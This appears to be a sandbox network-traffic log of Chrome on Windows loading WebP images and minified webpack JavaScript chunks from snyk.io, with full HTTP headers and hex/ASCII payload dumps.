                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 02 Oct 2024 11:54:13 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::j8hdb-1729799335779-4848bd4713ad
                                                                                                                                                                                                                                                                                                              X-Vercel-Imgsrc: 5bb68f6ef9bde975354918337bcba79f
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:55 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799335.1f5fee9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC2372INData Raw: 52 49 46 46 96 2d 00 00 57 45 42 50 56 50 38 20 8a 2d 00 00 90 1d 01 9d 01 2a c0 03 f6 01 3e 91 46 9e 4c 25 a3 a6 a2 a2 50 48 d0 d0 12 09 65 6e ff d2 e7 d2 97 97 7c ff fe fa 2f 6d 89 14 3a 79 04 02 5d 93 ce 6f 0e f1 a0 ae dd 7a 21 fe 29 fe ab d8 17 f5 eb a6 f7 99 8f dc 6f 5b df 52 3f e7 bd 45 7f d6 f5 2e fa 00 74 c0 7f 68 ff ad d4 01 ff ff db ff a5 1f c2 bf d0 7f 8b f5 95 e2 f7 e5 3c f1 fc 4b ec 3f d4 7f 61 fe e9 f0 8a d9 7f cb df c8 e1 47 f2 1f e1 7f 1a 7d c1 7f 12 fe 81 fe 83 87 9c 00 fd 6e f4 38 9a 9e 40 1c 0c 3f d7 f5 00 f1 4b ce f7 d5 7e c1 1f ac 1f f3 bf b6 76 89 f4 53 10 95 c1 d2 a7 11 2b 55 79 b7 f8 ba db fb af ee bf ba fe eb 5d ec 6f 65 f0 7e ad 7b 24 80 82 be 1e ee 37 28 85 dc 2b 9a 50 41 2e b6 d7 3b 04 69 6c 08 e4 45 8c 89 7f ac e4 b1 99 74 33
                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF-WEBPVP8 -*>FL%PHen|/m:y]oz!)o[R?E.th<K?aG}n8@?K~vS+Uy]oe~{$7(+PA.;ilEt3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC9306INData Raw: 10 98 6e fb f3 d7 06 04 c1 20 d5 44 45 d1 3c bc 50 b2 c2 68 e2 4a c1 6e 09 00 11 13 8d 22 c0 7f 4d b6 48 f1 1d 5e 81 9b 26 14 37 9a 99 9a be fc 72 a0 b4 e8 ab df 12 5c db ca bf 9a 00 94 8b 31 e0 0c 7e 87 2c 8e 6d 1a 6b 23 09 9c 32 57 f8 08 4a f8 cb fd d0 2d a0 52 8a e0 5c a8 aa d3 7f 0a 92 55 6e 49 11 f3 38 54 11 44 fd e1 cd ec 81 49 8a d8 19 07 d3 6b c1 3f 2d 5b b0 e6 a2 47 a0 a6 e4 45 1d 62 83 a1 a9 1c b4 bc a2 e3 b8 83 04 dc 9c 4c ea e5 a2 e4 47 ce 02 12 af 21 eb cd 82 2e 2d 2e e2 73 83 a0 00 90 d8 a1 cf 82 24 d2 7d d2 52 b5 82 74 8c 4e 06 a8 43 c7 d1 d0 1d eb ba 97 4a 81 f8 3a c9 80 03 72 fc 54 4a a9 91 4f e2 ae 56 d7 28 58 4e 95 18 e6 3d 64 35 16 48 a3 f0 88 32 7a 06 0b f8 e2 ba 7b e5 c5 cb dd f3 89 d9 0c cf c9 30 a0 d5 52 f0 4f be 37 07 8b cd 35 29
                                                                                                                                                                                                                                                                                                              Data Ascii: n DE<PhJn"MH^&7r\1~,mk#2WJ-R\UnI8TDIk?-[GEbLG!.-.s$}RtNCJ:rTJOV(XN=d5H2z{0RO75)


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              5192.168.2.54971823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC693OUTGET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1723050301%2Fwebsite-heroes%2Fbackground-images%2Fhero-homepage-2024.jpg&w=2560&q=75 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC714INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="hero-homepage-2024.webp"
                                                                                                                                                                                                                                                                                                              Content-Length: 11338
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 07 Aug 2024 17:06:39 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::jwrsn-1729799335738-df9fbc20b8cd
                                                                                                                                                                                                                                                                                                              X-Vercel-Imgsrc: f54bd4917a1ece816b793e593d7dcfa5
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:55 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799335.1f5fedb
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC3317INData Raw: 52 49 46 46 42 2c 00 00 57 45 42 50 56 50 38 20 36 2c 00 00 f0 a7 01 9d 01 2a a7 05 4f 03 3e 91 48 a0 4c a5 a7 b1 2d a0 92 b8 3a 20 12 09 67 6e ff d5 bd 92 a7 a4 cd c6 67 97 00 be 2f 9d f8 81 4f 08 79 87 57 9a 4d ff f3 cf 4b 76 c8 c6 70 26 e3 ff 2d ff f7 61 0f 62 7f fb c5 a5 c5 7d 5f ca 3f 86 bd 0f c4 db 59 6f 33 7e ef a4 3f 30 5e 83 1e 67 fc ed 3d 32 ff 8d f5 0c fe a5 d4 d7 e8 4f e7 4b eb 2b fd e7 ff 0f a4 76 ae ad 13 40 42 4c 9b 19 81 54 40 ac 64 fb 61 ca f8 ba 63 b4 91 89 72 96 4b 9c a1 6f 9d e2 b0 98 9e cd 44 5d 59 1f 06 8d 1a 34 68 d1 a3 c1 6f 5e bd 7a f9 af c5 2c f4 d7 6f f0 84 9c 92 cd 3d 04 57 31 28 1e 97 bf a6 1c 7c 99 c8 fe 18 af 4e 21 2c 67 b7 fb 31 8b 24 d9 5a 74 42 5a 5b 8d 48 75 cc ed 16 46 d7 cb 53 4e 56 ac e0 24 eb 3d cc da 19 b3 64 7c a6
                                                                                                                                                                                                                                                                                                              Data Ascii: RIFFB,WEBPVP8 6,*O>HL-: gng/OyWMKvp&-ab}_?Yo3~?0^g=2OK+v@BLT@dacrKoD]Y4ho^z,o=W1(|N!,g1$ZtBZ[HuFSNV$=d|
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC8021INData Raw: b8 17 1c 16 7a 5a 90 b1 83 eb 1c 7a 23 4e 74 20 ac 70 b9 3e b5 6a d6 e5 9b 59 5d 3e 59 e4 1a af 0c 2b 36 01 75 65 eb d7 af 90 a4 b2 bc d3 5e 39 e6 a7 5c 3c 44 23 ef 5e bd 7b 68 19 3f fa 66 78 52 b4 3b ce 11 28 03 4c cc e9 d3 7f ae aa 37 67 82 08 18 e9 d9 d7 5d e3 35 6a d9 39 28 08 4a 10 3d c2 24 e2 32 c4 40 00 fe f7 9a bf ff f3 34 7e c3 7e 19 fc 0f fd 26 96 c6 8e 3f 5c 52 85 10 3c d3 9c 8d 7a 4b a1 c9 d6 16 6a 92 a7 7d 0f d2 9e 80 f4 a7 aa 1b e8 86 7c 33 e1 31 97 a7 92 8e 0a 55 74 3f e7 f8 df b9 52 7b 76 d6 26 90 b5 b1 71 5a e3 99 3d 46 07 04 51 3e 4f cf e4 04 5e 80 ef d6 4d f9 3d f3 d6 3d 73 cc e7 25 0b ac f9 ea e7 74 9b a6 fc 82 63 b4 ba 58 97 7d 0e 0c 78 16 76 76 e3 2a eb d7 3e af d9 b5 51 7c 96 a0 3d b0 25 c6 9c 84 dd 0f 1a 36 77 59 f6 20 4a 84 04 f2
                                                                                                                                                                                                                                                                                                              Data Ascii: zZz#Nt p>jY]>Y+6ue^9\<D#^{h?fxR;(L7g]5j9(J=$2@4~~&?\R<zKj}|31Ut?R{v&qZ=FQ>O^M==s%tcX}xvv*>Q|=%6wY J


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              6192.168.2.54972123.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC516OUTGET /_next/static/chunks/8315.747656db2e96420a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="8315.747656db2e96420a.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7abca888c0d57ab9671d55be3b5c4af4"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/8315.747656db2e96420a.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::7vcsc-1729257049051-9c447f8a561f
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:55 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3442
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799335.1f5fef3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC3442INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 33 31 35 5d 2c 7b 37 33 33 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6e 2c 69 29 7b 69 2e 64 28 6e 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 65 3d 69 28 38 35 38 39 33 29 2c 6f 3d 69 28 34 35 36 39 37 29 2c 61 3d 69 2e 6e 28 6f 29 2c 73 3d 69 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 6c 29 7b 6c 65 74 7b 6c 61 62 65 6c 3a 6e 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 7d 3d 6c 3b 72 65 74 75 72 6e 28 30 2c 65 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8315],{73359:function(l,n,i){i.d(n,{Z:function(){return u}});var e=i(85893),o=i(45697),a=i.n(o),s=i(44133);function d(l){let{label:n,className:i}=l;return(0,e.jsx)("span",{className:(0,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              7192.168.2.54972523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC516OUTGET /_next/static/chunks/8796.579c4548d83cb2ef.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="8796.579c4548d83cb2ef.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"3157cfe467f518fa1b9e43042fd8985f"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/8796.579c4548d83cb2ef.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::2px95-1729257049114-220dde1cdf26
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 1896
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799336.1f60005
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC1896INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 37 39 36 5d 2c 7b 39 36 30 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 61 29 7b 61 2e 64 28 69 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 65 3d 61 28 38 35 38 39 33 29 2c 6e 3d 61 28 34 35 36 39 37 29 2c 72 3d 61 2e 6e 28 6e 29 2c 73 3d 61 28 37 37 35 36 29 2c 74 3d 61 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6c 29 7b 76 61 72 20 69 3b 6c 65 74 7b 69 6d 61 67 65 3a 61 2c 69 73 53 6d 61 6c 6c 3a 6e 2c 68 61 73 4d 69 6e 48 65 69 67 68 74 3a 72 2c 6f 62 6a 65 63 74 46 69 74 3a 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8796],{96059:function(l,i,a){a.d(i,{Z:function(){return c}});var e=a(85893),n=a(45697),r=a.n(n),s=a(7756),t=a(44133);function o(l){var i;let{image:a,isSmall:n,hasMinHeight:r,objectFit:o


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              8192.168.2.54972823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC516OUTGET /_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9875.8b3ce8ccbc1ad2ec.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7342546a5d5f4f44c1f41779b7d84698"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::6gp5b-1729257050682-06558f02e206
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 9671
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799336.1f6006c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC9671INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 38 37 35 5d 2c 7b 37 33 33 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 65 29 7b 65 2e 64 28 69 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 6f 3d 65 28 38 35 38 39 33 29 2c 6e 3d 65 28 34 35 36 39 37 29 2c 64 3d 65 2e 6e 28 6e 29 2c 61 3d 65 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 74 28 6c 29 7b 6c 65 74 7b 6c 61 62 65 6c 3a 69 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 7d 3d 6c 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9875],{73359:function(l,i,e){e.d(i,{Z:function(){return r}});var o=e(85893),n=e(45697),d=e.n(n),a=e(44133);function t(l){let{label:i,className:e}=l;return(0,o.jsx)("span",{className:(0,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              9192.168.2.54972923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC375OUTGET /_next/static/chunks/8315.747656db2e96420a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="8315.747656db2e96420a.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7abca888c0d57ab9671d55be3b5c4af4"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/8315.747656db2e96420a.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::6hxd8-1729257049192-919e0779a649
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3442
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799336.1090b6f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC3442INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 33 31 35 5d 2c 7b 37 33 33 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6e 2c 69 29 7b 69 2e 64 28 6e 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 65 3d 69 28 38 35 38 39 33 29 2c 6f 3d 69 28 34 35 36 39 37 29 2c 61 3d 69 2e 6e 28 6f 29 2c 73 3d 69 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 6c 29 7b 6c 65 74 7b 6c 61 62 65 6c 3a 6e 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 7d 3d 6c 3b 72 65 74 75 72 6e 28 30 2c 65 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8315],{73359:function(l,n,i){i.d(n,{Z:function(){return u}});var e=i(85893),o=i(45697),a=i.n(o),s=i(44133);function d(l){let{label:n,className:i}=l;return(0,e.jsx)("span",{className:(0,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              10192.168.2.54973123.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC492OUTGET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1723050301%2Fwebsite-heroes%2Fbackground-images%2Fhero-homepage-2024.jpg&w=2560&q=75 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
